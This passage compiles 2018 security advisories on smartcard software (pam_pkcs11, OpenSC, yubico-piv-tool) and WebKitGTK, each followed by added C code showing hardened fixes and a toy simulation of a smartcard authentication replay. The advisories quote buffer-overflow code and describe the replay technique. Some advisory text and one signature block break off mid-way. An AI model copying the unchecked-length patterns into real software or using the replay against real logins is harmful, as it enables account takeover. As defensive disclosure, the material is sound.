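    /* The card-supplied length must be covered by bytes actually received. */
    if (this_len > recv_len - *pos - 1)
        return HEX_ERR_TRUNCATED;
    /* Two characters per byte plus the NUL that sprintf() would also write. */
    if (out_len < 2 * this_len + 1)
        return HEX_ERR_NOSPACE;

    const uint8_t *p = recv + *pos + 1;
    for (size_t i = 0; i < this_len; i++) {
        out[2 * i]     = digits[p[i] >> 4];
        out[2 * i + 1] = digits[p[i] & 0x0f];
    }
    out[2 * this_len] = '\0';
    *pos += 1 + this_len;
    return (int)(2 * this_len);
}

/* Constructed card response (not captured from a device): two items,
 * {ab cd} and {ff}. */
static const uint8_t sample_response[] = { 0x02, 0xab, 0xcd, 0x01, 0xff };

/* Encode both items into buffers that are exactly large enough
 * ("abcd" + NUL = 5, "ff" + NUL = 3). Returns 1 when both came out right. */
int demo_fits(void)
{
    char first[5], second[3];
    size_t pos = 0;
    if (encode_item(sample_response, sizeof sample_response, &pos, first, sizeof first) != 4)
        return 0;
    if (encode_item(sample_response, sizeof sample_response, &pos, second, sizeof second) != 2)
        return 0;
    return strcmp(first, "abcd") == 0 && strcmp(second, "ff") == 0 && pos == 5;
}

/* A 4-byte buffer passes the original "real_len + 2 > *len" test for a
 * two-byte item but has no room for the NUL: rejected here. */
int demo_off_by_one(void)
{
    char out[4];
    size_t pos = 0;
    return encode_item(sample_response, sizeof sample_response, &pos, out, sizeof out);
}

/* A length byte claiming more data than the card actually sent. */
int demo_short_response(void)
{
    static const uint8_t lying[] = { 0x05, 0x01 };
    char out[16];
    size_t pos = 0;
    return encode_item(lying, sizeof lying, &pos, out, sizeof out);
}

int main(void)
{
    printf("both items fit     -> %d\n", demo_fits());
    printf("off-by-one buffer  -> %d\n", demo_off_by_one());
    printf("truncated response -> %d\n", demo_short_response());
    return 0;
}
```

Writing the digits directly instead of calling `sprintf()` also removes the hidden extra byte entirely; the NUL is then written once, deliberately, after the space check.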
X41 D-Sec GmbH Security Advisory X41-2018-003: Multiple Vulnerabilities in pam_pkcs11

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-003

Multiple Vulnerabilities in pam_pkcs11
======================================

Overview
--------
Confirmed Affected Versions: 0.6.9
Confirmed Patched Versions: -
Vendor: Unmaintained
Vendor URL: https://github.com/OpenSC/pam_pkcs11
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-003-pam_pkcs11/

Summary and Impact
------------------
It is possible to replay an authentication by using a specially prepared
smartcard or token in case pam-pkcs11 is compiled with NSS support.
Furthermore two minor implementation issues have been identified.

X41 did not perform a full test or audit on the software.

Product Description
-------------------
This Linux-PAM login module allows an X.509 certificate based user login.
The certificate and its dedicated private key are thereby accessed by
means of an appropriate PKCS #11 module. For the verification of the
users' certificates, locally stored CA certificates as well as either
online or locally accessible CRLs are used.

Authentication Replay
=====================
Severity Rating: High
Vector: Login attempt at compromised machine
CVE: -
CWE: 125
CVSS Score: 7.0 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Summary and Impact
------------------
A replay attack is possible due to a logic bug in file pam_pkcs11.c. In
function `pam_sm_authenticate()` a nonce is generated and signed with the
card to verify that the card holds the matching secret key, if a valid
certificate is found. This is done using the function
`get_random_value()`, which in turn calls `PK11_GenerateRandom()`, which
queries the smartcard for random data. This allows for a replay attack
with a malicious smartcard.

If a user plugs his card into a compromised computer, the nonce and
answer can be recorded by an attacker. The attacker then modifies a
smartcard or a smartcard emulator to replay with the exact same nonce
and signed data, which allows the attacker to login to another computer
without having further access to the smartcard.

Workarounds
-----------
Switch to pam_p11.

Buffer Overflow
===============
Severity Rating: Low
Vector: Overly long user home directory
CVE: -
CWE: 121
CVSS Score: -
CVSS Vector: -

Summary and Impact
------------------
In file openssh_mapper.c a stack based buffer overflow is possible if a
user has a home directory with a length of more than 512 bytes. This
allows overwriting the passwd structure and possibly the return address
in `openssh_mapper_match_user()`:

{% highlight c %}
/* openssh_mapper.c */
static int openssh_mapper_match_user(X509 *x509, const char *user, void *context) {
        struct passwd *pw;
        char filename[512];
        if (!x509) return -1;
        if (!user) return -1;
        pw = getpwnam(user);
        if (!pw || is_empty_str(pw->pw_dir) ) {
            DBG1("User '%s' has no home directory",user);
            return -1;
        }
        sprintf(filename,"%s/.ssh/authorized_keys",pw->pw_dir);
        return openssh_mapper_match_keys(x509,filename);
}
{% endhighlight %}

Workarounds
-----------
Switch to pam_p11.

Memory not cleaned properly before free()
=========================================
Severity Rating: Low
Vector: -
CVE: -
CWE: 244
CVSS Score: -
CVSS Vector: -

Summary and Impact
------------------
In several places memory is set to zero using memset() and passed on to
free() afterwards. This is a pattern which modern compilers optimize
away, since the store is dead, which renders the call to memset()
useless. This causes sensitive data such as passwords to remain in
memory, which defeats the original intention of the code.

{% highlight c %}
memset(password, 0, strlen(password));
free(password);
{% endhighlight %}

Workarounds
-----------
Switch to pam_p11.

Timeline
--------
2018-02-03 Issues found
2018-04-18 Vendor contacted
2018-04-18 Vendor reply
2018-05-18 Technical details provided
2018-05-24 Private git branch created, issues fixed
2018-08-08 Patched version released at https://github.com/x41sec/pam_pkcs11
2018-08-11 Advisory released

--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty3K4ACgkQo5Klpg50
CxDfHhAAiANUMfz5YSGvQS8HJYcAwiDwL5Z6TRJEKg4RRS94hehzpDCHaVaABsnB
6BtRCx6Jp8hDs9Iz36y+E8txg349OSUyrRSL9RQ6/G7MrLOJ0kOxijkAWbvJg/nD
elgsGa65DKWwqHvc5AsRXxWZFtyNs6CTWGyfJJvyC3cpHM0E0jru5xjuwklm1YAG
DOcqadZav2FPzKJz5tYsDa42aAWYyjE2MMXzkY7kT3aQ2G70DhN2mJqnnmsmMFcH
GZaZO+4SaWq97SNVzzvKXk9m0T8S2HmumAF8g9mGLuCTfBVsbi4DmGyb9mvZOK2S
djwBCHf0rRqXP83hszwHD/zQoW796r7tj9PGmKmvRoDeX76aGuLgQoZ55zged9R1
QkPiD89w+7YANMHumsfLXgXRdhxWaObFvtJWtFCd+v0iS5r249zYukJXn89lnY4p
1x3eBPOzYfSvdHBV0d8/l8uiqZGM9mN55Y4AvkOQ
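The two pam_pkcs11 findings that have a code-level fix (the card-supplied nonce and the memset()-before-free()) are modelled in the added example below, which is not pam_pkcs11 code. The host side is simulated: a replaying card returns a recorded nonce and signature, the "signature" is a toy FNV-1a keyed hash constructed so the file is self-contained (it is not a real signature scheme), and the key, nonce and recording are constructed values. The point it shows is that a recorded answer keeps working only while the card is allowed to choose the nonce; once the host draws the nonce from its own CSPRNG the replay fails, and the zeroing helper uses a volatile function pointer so the compiler cannot drop the store.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NONCE_LEN 16

/* Toy keyed hash (FNV-1a over key || nonce): constructed stand-in for the
 * card's signature and for the host's verification. Not a real scheme. */
static uint64_t toy_sign(uint64_t key, const uint8_t *nonce)
{
    uint64_t h = 1469598103934665603ULL ^ key;
    for (size_t i = 0; i < NONCE_LEN; i++) {
        h ^= nonce[i];
        h *= 1099511628211ULL;
    }
    return h;
}

/* memset() through a volatile function pointer cannot be elided as a dead
 * store, unlike the plain memset() before free() shown in the advisory. */
static void *(*volatile memset_fn)(void *, int, size_t) = memset;
void secure_memzero(void *p, size_t n) { memset_fn(p, 0, n); }

/* Host-side nonce source: the host's own CSPRNG, never the card. */
int host_random(uint8_t *buf, size_t len)
{
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return -1;
    size_t got = fread(buf, 1, len, f);
    fclose(f);
    return got == len ? 0 : -1;
}

/* What an attacker records from one legitimate login on a compromised host. */
typedef struct { uint8_t nonce[NONCE_LEN]; uint64_t sig; } recording_t;

/* A replaying card "generates" the recorded nonce and answers every
 * challenge with the recorded signature. */
static void replay_card_random(const recording_t *r, uint8_t *out) { memcpy(out, r->nonce, NONCE_LEN); }
static uint64_t replay_card_sign(const recording_t *r, const uint8_t *nonce) { (void)nonce; return r->sig; }

static const uint64_t GENUINE_KEY = 0x5ca1ab1e5ca1ab1eULL;   /* constructed */

/* Vulnerable flow (pam_pkcs11 built with NSS): the nonce comes from the card. */
int auth_card_nonce(const recording_t *r)
{
    uint8_t nonce[NONCE_LEN];
    replay_card_random(r, nonce);                 /* the PK11_GenerateRandom() path */
    uint64_t sig = replay_card_sign(r, nonce);
    int ok = toy_sign(GENUINE_KEY, nonce) == sig;
    secure_memzero(nonce, sizeof nonce);
    return ok;
}

/* Fixed flow: the nonce comes from the host, so a recorded answer no longer
 * matches (except with probability 2^-64 for this toy hash). */
int auth_host_nonce(const recording_t *r)
{
    uint8_t nonce[NONCE_LEN];
    if (host_random(nonce, sizeof nonce) != 0) return -1;
    uint64_t sig = replay_card_sign(r, nonce);
    int ok = toy_sign(GENUINE_KEY, nonce) == sig;
    secure_memzero(nonce, sizeof nonce);
    return ok;
}

/* A genuine card signs whatever nonce the host sends, so it still passes. */
int auth_genuine_card(void)
{
    uint8_t nonce[NONCE_LEN];
    if (host_random(nonce, sizeof nonce) != 0) return -1;
    uint64_t sig = toy_sign(GENUINE_KEY, nonce);  /* card-side signing */
    int ok = toy_sign(GENUINE_KEY, nonce) == sig;
    secure_memzero(nonce, sizeof nonce);
    return ok;
}

/* Build the recording an attacker would capture from a genuine login. */
recording_t make_recording(void)
{
    recording_t r;
    memset(r.nonce, 0x42, NONCE_LEN);             /* constructed "recorded" nonce */
    r.sig = toy_sign(GENUINE_KEY, r.nonce);
    return r;
}

int demo_replay_card_nonce(void) { recording_t r = make_recording(); return auth_card_nonce(&r); }
int demo_replay_host_nonce(void) { recording_t r = make_recording(); return auth_host_nonce(&r); }

/* Returns 1 if secure_memzero() really cleared a password buffer. */
int demo_zeroize(void)
{
    char pw[32] = "constructed-secret";
    secure_memzero(pw, sizeof pw);
    for (size_t i = 0; i < sizeof pw; i++) if (pw[i]) return 0;
    return 1;
}

int main(void)
{
    printf("replay vs card-supplied nonce: %s\n", demo_replay_card_nonce() == 1 ? "ACCEPTED" : "rejected");
    printf("replay vs host-supplied nonce: %s\n", demo_replay_host_nonce() == 1 ? "ACCEPTED" : "rejected");
    printf("genuine card, host nonce:      %s\n", auth_genuine_card() == 1 ? "accepted" : "REJECTED");
    printf("buffer zeroed:                 %d\n", demo_zeroize());
    return 0;
}
```

On platforms that provide `explicit_bzero()` or `memset_s()`, those are the preferred replacement for the volatile-pointer trick; the structure of the fix (host entropy for the challenge, guaranteed wiping of the buffers) is the same.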
X41 D-Sec GmbH Security Advisory X41-2018-002: Multiple Vulnerabilities in OpenSC

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-002

Multiple Vulnerabilities in OpenSC
==================================

Overview
--------
Confirmed Affected Versions: 0.18.0
Confirmed Patched Versions: possibly 0.19.0
Vendor: OpenSC
Vendor URL: https://github.com/OpenSC/OpenSC
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-002-OpenSC/

Summary and Impact
------------------
Multiple issues have been identified in OpenSC, ranging from stack based
buffer overflows to out of bounds reads and writes on the heap. They can
be triggered by malicious smartcards sending malformed responses to APDU
commands.

In addition to the issues reported here, a lot of minor issues (e.g. OOB
reads and similar) have been reported and fixed. The OpenSC team
(especially Frank Morgner) did an excellent job on identifying and
fixing further issues. Due to the large amount of issues, no individual
issues have been rated with CVSS / CVE ID yet.

X41 did not perform a full test or audit on the software, but tried to
help identify as many bugs as possible over the course of a year.

Product Description
-------------------
OpenSC provides a set of libraries and utilities to work with smart
cards. Its main focus is on cards that support cryptographic operations,
and facilitate their use in security applications such as
authentication, mail encryption and digital signatures.

OOB Write in muscle_list_files()
================================
In function muscle_list_files() in file src/libopensc/card-muscle.c an
out of bounds write might occur, since bufLen is not checked.

{% highlight c %}
static int muscle_list_files(sc_card_t *card, u8 *buf, size_t bufLen)
{
	muscle_private_t* priv = MUSCLE_DATA(card);
	mscfs_t *fs = priv->fs;
	int x;
	int count = 0;

	mscfs_check_cache(priv->fs);
	for(x = 0; x < fs->cache.size; x++) {
		u8* oid = fs->cache.array[x].objectId.id;
		sc_debug(card->ctx, SC_LOG_DEBUG_NORMAL,
			"FILE: %02X%02X%02X%02X\n",
			oid[0],oid[1],oid[2],oid[3]);
		if(0 == memcmp(fs->currentPath, oid, 2)) {
			buf[0] = oid[2];
			buf[1] = oid[3];
			if(buf[0] == 0x00 && buf[1] == 0x00) continue; /* No directories/null names outside of root */
			buf += 2;
			count+=2;
		}
	}
	return count;
}
{% endhighlight %}

OOB Write in tcos_select_file()
===============================
In function tcos_select_file() in file src/libopensc/card-tcos.c a
filename is extracted from an APDU response and written into the
internal file->name variable.

{% highlight c %}
		case 0x84:
			memcpy(file->name, d, len);
			file->namelen = len;
			break;
{% endhighlight %}

No check is performed whether the string retrieved from the card fits
into the buffer, which could trigger an OOB write.

OOB Write in piv_validate_general_authentication()
==================================================
In case piv_validate_general_authentication() in
src/libopensc/card-piv.c is called with a datalen parameter greater
than 4096, an out of bounds write occurs. Currently no caller seems to
do this.

OOB Write in gemsafe_get_cert_len()
===================================
The function gemsafe_get_cert_len() in file
src/libopensc/pkcs15-gemsafeV1.c might write beyond the gemsafe_prkeys
and gemsafe_cert arrays in case more than 12 containers are stored on
the card.

{% highlight c %}
	ind = 2; /* skip length */
	while (ibuf[ind] == 0x01) {
		if (ibuf[ind+1] == 0xFE) {
			gemsafe_prkeys[i].ref = ibuf[ind+4];
			sc_log(card->ctx, "Key container %d is allocated and uses key_ref %d",
					i+1, gemsafe_prkeys[i].ref);
			ind += 9;
		}
		else {
			gemsafe_prkeys[i].label = NULL;
			gemsafe_cert[i].label = NULL;
			sc_log(card->ctx, "Key container %d is unallocated", i+1);
			ind += 8;
		}
		i++;
	}
{% endhighlight %}

OOB Write in util_acl_to_str()
==============================
In function util_acl_to_str() in file src/tools/util.c no checks are
performed whether the string put together fits into line, which could
be abused to trigger limited out of bounds writes.

OOB Write in read_public_key() and read_private_key()
=====================================================
In function read_public_key() in file src/tools/cryptoflex-tool.c the
bufsize variable is overwritten with file->size retrieved from the
smartcard. This
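The OpenSC findings above are all writes whose size or count is chosen by the card. As an added example (not OpenSC code; the types, error code and card contents below are constructed stand-ins), here is the muscle_list_files() listing rewritten so that bufLen is consulted before each two-byte write, together with a bounded version of the tcos_select_file() name copy.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint8_t u8;
#define ERR_BUFFER_TOO_SMALL (-1)   /* constructed; OpenSC uses its own SC_ERROR_* values */

/* Minimal stand-ins for the MUSCLE file-system cache types. */
typedef struct { u8 id[4]; } msc_object_t;
typedef struct { const msc_object_t *array; size_t size; } msc_cache_t;
typedef struct { u8 currentPath[2]; msc_cache_t cache; } msc_fs_t;

/* Hardened listing: same output format as muscle_list_files() (two name
 * bytes per entry under the current path), but every write is preceded
 * by a check against bufLen. Returns bytes written or ERR_BUFFER_TOO_SMALL. */
int list_files_bounded(const msc_fs_t *fs, u8 *buf, size_t bufLen)
{
    size_t count = 0;
    for (size_t x = 0; x < fs->cache.size; x++) {
        const u8 *oid = fs->cache.array[x].id;
        if (memcmp(fs->currentPath, oid, 2) != 0)
            continue;                            /* not in the current directory */
        if (oid[2] == 0x00 && oid[3] == 0x00)
            continue;                            /* no directories/null names outside of root */
        if (bufLen - count < 2)
            return ERR_BUFFER_TOO_SMALL;         /* the check the original lacks */
        buf[count]     = oid[2];
        buf[count + 1] = oid[3];
        count += 2;
    }
    return (int)count;
}

/* Hardened counterpart of the 0x84 case in tcos_select_file(): the name
 * from the card is copied only if it fits the destination. */
int set_file_name(u8 *name, size_t name_cap, size_t *namelen,
                  const u8 *d, size_t len)
{
    if (len > name_cap)
        return ERR_BUFFER_TOO_SMALL;
    memcpy(name, d, len);
    *namelen = len;
    return 0;
}

/* Constructed card contents: three objects under 3F00, one under 3F01,
 * and one null name under 3F00 that must be skipped. */
static const msc_object_t sample_objects[] = {
    {{0x3F, 0x00, 0x00, 0x01}}, {{0x3F, 0x00, 0x00, 0x02}},
    {{0x3F, 0x01, 0x00, 0x03}}, {{0x3F, 0x00, 0x00, 0x00}},
    {{0x3F, 0x00, 0x00, 0x04}},
};

/* Lists the sample card into a buffer of bufLen bytes (at most 16). */
int demo_list(size_t bufLen)
{
    msc_fs_t fs = { {0x3F, 0x00}, { sample_objects, 5 } };
    u8 buf[16];
    if (bufLen > sizeof buf) return -2;
    return list_files_bounded(&fs, buf, bufLen);
}

/* Tries to store a name of `len` bytes into a 16-byte name field. */
int demo_name(size_t len)
{
    u8 name[16], src[64];
    size_t namelen = 0;
    memset(src, 'A', sizeof src);
    if (len > sizeof src) return -2;
    return set_file_name(name, sizeof name, &namelen, src, len);
}

int main(void)
{
    printf("6-byte buffer: %d, 5-byte buffer: %d\n", demo_list(6), demo_list(5));
    printf("16-byte name: %d, 17-byte name: %d\n", demo_name(16), demo_name(17));
    return 0;
}
```

The same shape of check (compare the card-supplied count with the fixed array size before indexing) is what bounds the `i` loop in gemsafe_get_cert_len() at the number of containers the arrays can hold.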
X41 D-Sec GmbH Security Advisory X41-2018-001: Multiple Vulnerabilities in Yubico Piv

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2018-001

Multiple Vulnerabilities in Yubico Piv
======================================

Overview
--------
Confirmed Affected Versions: 1.5.0
Confirmed Patched Versions: 1.6.0
Vendor: Yubico
Vendor URL: https://www.yubico.com/
Vendor Advisory URL: https://www.yubico.com/support/security-advisories
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-001-Yubico-Piv/

Summary and Impact
------------------
A buffer overflow and an out of bounds memory read were identified in
yubico-piv-tool 1.5.0; these can be triggered by a malicious token.

X41 did not perform a full test or audit on the software.

Product Description
-------------------
YubiKey 4, YubiKey 4 Nano, YubiKey 4C, YubiKey 4C Nano, and YubiKey NEO
provide Smart Card functionality based on the Personal Identity
Verification (PIV) interface specified in NIST SP 800-73,
"Cryptographic Algorithms and Key Sizes for PIV."

Out of Bounds Write via Malicious APDU
======================================
Severity Rating: High
Vector: APDU Response
CVE: CVE-2018-14779
CWE: 120
CVSS Score: 7.1 (High)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary and Impact
------------------
File lib/ykpiv.c contains the following code in function
ykpiv_transfer_data():

{% highlight c %}
      if(*out_len + recv_len - 2 > max_out) {
	fprintf(stderr, "Output buffer to small, wanted to write %lu, max was %lu.", *out_len + recv_len - 2, max_out);
      }
      if(out_data) {
	memcpy(out_data, data, recv_len - 2);
	out_data += recv_len - 2;
	*out_len += recv_len - 2;
      }
{% endhighlight %}

It is checked whether the buffer is big enough to hold the data copied
using memcpy(), but the check only prints a message: nothing prevents
the memcpy() from going ahead when the check fails. This code path can
be triggered with malicious data coming from a smartcard.

Workarounds
-----------
None

Out of Bounds Read via malicious APDU
=====================================
Severity Rating: Low
Vector: APDU Response
CVE: CVE-2018-14780
CWE: 125
CVSS Score: 2.2 (Low)
CVSS Vector: CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N

Summary and Impact
------------------
File lib/ykpiv.c contains the following code in function
_ykpiv_fetch_object():

{% highlight c %}
  if(sw == SW_SUCCESS) {
    size_t outlen;
    int offs = _ykpiv_get_length(data + 1, &outlen);
    if(offs == 0) {
      return YKPIV_SIZE_ERROR;
    }
    memmove(data, data + 1 + offs, outlen);
    *len = outlen;
    return YKPIV_OK;
  } else {
    return YKPIV_GENERIC_ERROR;
  }
{% endhighlight %}

In the end, a memmove() occurs with a length retrieved from the APDU
data. This length is not checked against the amount of APDU data
actually retrieved. Therefore the memmove() could copy bytes from
beyond the allocated data buffer into this buffer.

Workarounds
-----------
None

Timeline
--------
2018-02-03 Issues found
2018-05-22 Vendor contacted
2018-05-22 Vendor reply
2018-06-05 Requesting technical feedback from the vendor
2018-06-06 Vendor confirms bug
2018-08-01 CVE ID requested
2018-08-02 CVE ID assigned
2018-08-08 Patched version released by vendor
2018-08-11 Advisory released

--
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAlty2NwACgkQo5Klpg50
CxADgQ//UhL2gZIdimeg1HuJZRz0YcjXMvhGhZoCXOeIcw5+GGrYbnlHX0fwe5eq
w9LGLYFDxvoa4ubassR9B+rFVbQ2hg9IVK1rv/VublRRjPZhMyZuGgpKjSPXptn1
/vsQ3SW75SX6c3JKKgyam5tXP/4ke3+1Xpb9W+NpXkhXtk3x78PJDSQMNXdXXWTT
WsSYd7icdUI8Z96DkPUntpgbohPu2Si3G16JnHbRYKI0Mjylz6cgVkcYe6whIehq
DefhoAFyIrPHPjXHr7Gy4BJnxgyEmuNBfVvNQPGd3YgxadGdozFi733Gnjoo1CAn
gJl35rAL794Ww2orISm8oZXUJpTYsi53l4dS4rSFmPnj27bHDSh0s8PcmVP6K0UN
51vC/FO+1J8PRcbZdGp71ePNRYvNNwhTIecY70dn4hX12n/82V466bRGjpLXtNBM
8+0of95VcZQyJFXNNzyTvXMQVA25Lcbo0YkScwaPm6Ob1S1NtzsucojF5TlrXo7e
zVAkAS9NqsWTJZVlPQIXdEpQarU8GcPW26BsjB0YpAHvsrywjWbSWLUfI7GFAAhF
25f5NH3bT8ti1wzTnEOs5/0vl9yL5IMVOcggxsT9DbirqVi4qiCPqXg+6v8GzT18
gNTz9w19ZBMehkc400u8PuBzcTlTjiSpdi2IsqaxQoxIpkg8zGw=
=fNlG
-----END PGP SIGNATURE-----
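Both yubico-piv-tool findings come down to a length from the card that is compared (or not compared) with the buffer and then acted on regardless. The block below is an added example, not yubico-piv-tool code: a hardened append for the transfer_data() path that refuses the copy instead of only printing, and a bounded BER length decoder plus object unwrap for the fetch_object() path that rejects a declared length larger than what the card actually returned. The error codes and the response bytes are constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { PIV_OK = 0, PIV_SIZE_ERROR = -1 };   /* constructed; ykpiv has its own ykpiv_rc values */

/* Hardened counterpart of the append in ykpiv_transfer_data(): when the
 * response does not fit, refuse the copy instead of only printing. */
int append_response(uint8_t *out, size_t max_out, size_t *out_len,
                    const uint8_t *data, size_t recv_len)
{
    if (recv_len < 2)
        return PIV_SIZE_ERROR;                    /* need at least SW1 SW2 */
    size_t n = recv_len - 2;
    if (n > max_out - *out_len)
        return PIV_SIZE_ERROR;                    /* original: fprintf() and carry on */
    memcpy(out + *out_len, data, n);
    *out_len += n;
    return PIV_OK;
}

/* BER length decoder (short form, 0x81 and 0x82 long forms), bounded by
 * the bytes available. Returns the size of the length field, 0 on error. */
int get_length_bounded(const uint8_t *buf, size_t avail, size_t *len)
{
    if (avail < 1) return 0;
    if (buf[0] < 0x80) { *len = buf[0]; return 1; }
    if (buf[0] == 0x81) {
        if (avail < 2) return 0;
        *len = buf[1];
        return 2;
    }
    if (buf[0] == 0x82) {
        if (avail < 3) return 0;
        *len = ((size_t)buf[1] << 8) | buf[2];
        return 3;
    }
    return 0;
}

/* Hardened tail of _ykpiv_fetch_object(): data holds tag, length, value as
 * received (recv_len bytes). The value is moved to the front only if the
 * declared length lies inside what the card actually returned. */
int unwrap_object(uint8_t *data, size_t recv_len, size_t *len)
{
    size_t outlen = 0;
    if (recv_len < 2)
        return PIV_SIZE_ERROR;
    int offs = get_length_bounded(data + 1, recv_len - 1, &outlen);
    if (offs == 0)
        return PIV_SIZE_ERROR;
    if (outlen > recv_len - 1 - (size_t)offs)
        return PIV_SIZE_ERROR;                    /* the check the original lacks */
    memmove(data, data + 1 + offs, outlen);
    *len = outlen;
    return PIV_OK;
}

/* Scenarios over constructed responses (not captured from a YubiKey). */
int demo_unwrap_ok(void)
{
    uint8_t data[] = { 0x53, 0x03, 'a', 'b', 'c' };
    size_t len = 0;
    if (unwrap_object(data, sizeof data, &len) != PIV_OK) return 0;
    return len == 3 && memcmp(data, "abc", 3) == 0;
}

int demo_unwrap_lying_length(void)
{
    uint8_t data[] = { 0x53, 0x81, 0xFF, 'a' };   /* declares 255 bytes, carries 1 */
    size_t len = 0;
    return unwrap_object(data, sizeof data, &len);
}

/* Two 3-byte responses (plus status) into a 4-byte output buffer: the
 * second append must be rejected rather than overflow. */
int demo_append(void)
{
    uint8_t out[4], resp[] = { 1, 2, 3, 0x90, 0x00 };
    size_t out_len = 0;
    if (append_response(out, sizeof out, &out_len, resp, sizeof resp) != PIV_OK) return -9;
    return append_response(out, sizeof out, &out_len, resp, sizeof resp);
}

int main(void)
{
    printf("unwrap ok: %d, lying length: %d, second append: %d\n",
           demo_unwrap_ok(), demo_unwrap_lying_length(), demo_append());
    return 0;
}
```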
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0006

WebKitGTK+ and WPE WebKit Security Advisory                 WSA-2018-0006

Date reported           : August 07, 2018
Advisory ID             : WSA-2018-0006
WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0006.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0006.html
CVE identifiers         : CVE-2018-4246, CVE-2018-4261, CVE-2018-4262,
                          CVE-2018-4263, CVE-2018-4264, CVE-2018-4265,
                          CVE-2018-4266, CVE-2018-4267, CVE-2018-4270,
                          CVE-2018-4271, CVE-2018-4272, CVE-2018-4273,
                          CVE-2018-4278, CVE-2018-4284, CVE-2018-12911.

Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit.

CVE-2018-4246
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.1.
  Credit to OSS-Fuzz.
  Processing maliciously crafted web content may lead to arbitrary code
  execution. A type confusion issue was addressed with improved memory
  handling.

CVE-2018-4261
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to Omair working with Trend Micro's Zero Day Initiative.
  Processing maliciously crafted web content may lead to arbitrary code
  execution. A memory corruption issue was addressed with improved memory
  handling.

CVE-2018-4262
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to Mateusz Krzywicki working with Trend Micro's Zero Day Initiative.
  Processing maliciously crafted web content may lead to arbitrary code
  execution. A memory corruption issue was addressed with improved memory
  handling.

CVE-2018-4263
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to Arayz working with Trend Micro's Zero Day Initiative.
  Processing maliciously crafted web content may lead to arbitrary code
  execution. A memory corruption issue was addressed with improved memory
  handling.

CVE-2018-4264
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to OSS-Fuzz, Yu Zhou and Jundong Xie of Ant-financial Light-Year
  Security Lab.
  Processing maliciously crafted web content may lead to arbitrary code
  execution. A memory corruption issue was addressed with improved memory
  handling.

CVE-2018-4265
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to cc working with Trend Micro's Zero Day Initiative.
  Processing maliciously crafted web content may lead to arbitrary code
  execution. A memory corruption issue was addressed with improved memory
  handling.

CVE-2018-4266
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to OSS-Fuzz.
  A malicious website may be able to cause a denial of service. A race
  condition was addressed with additional validation.

CVE-2018-4267
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to Arayz of Pangu team working with Trend Micro's Zero Day
  Initiative.
  Processing maliciously crafted web content may lead to arbitrary code
  execution. A memory corruption issue was addressed with improved memory
  handling.

CVE-2018-4270
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to OSS-Fuzz.
  Processing maliciously crafted web content may lead to an unexpected
  application crash. A memory corruption issue was addressed with improved
  memory handling.

CVE-2018-4271
  Versions affected: WebKitGTK+ before 2.20.2.
  Credit to OSS-Fuzz.
  Processing maliciously crafted web content may lead to an unexpected
  application crash. A memory corruption issue was addressed with improved
  input validation.

CVE-2018-4272
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to OSS-Fuzz.
  Processing maliciously crafted web content may lead to arbitrary code
  execution. A memory corruption issue was addressed with improved memory
  handling.

CVE-2018-4273
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to OSS-Fuzz.
  Processing maliciously crafted web content may lead to an unexpected
  application crash. A memory corruption issue was addressed with improved
  input validation.

CVE-2018-4278
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to Jun Kokatsu (@shhnjk).
  A malicious website may exfiltrate audio data cross-origin. Sound fetched
  through audio elements may be exfiltrated cross-origin. This issue was
  addressed with improved audio taint tracking.

CVE-2018-4284
  Versions affected: WebKitGTK+ before 2.20.4 and WPE WebKit before 2.20.2.
  Credit to OSS-Fuzz.
  Processing malici
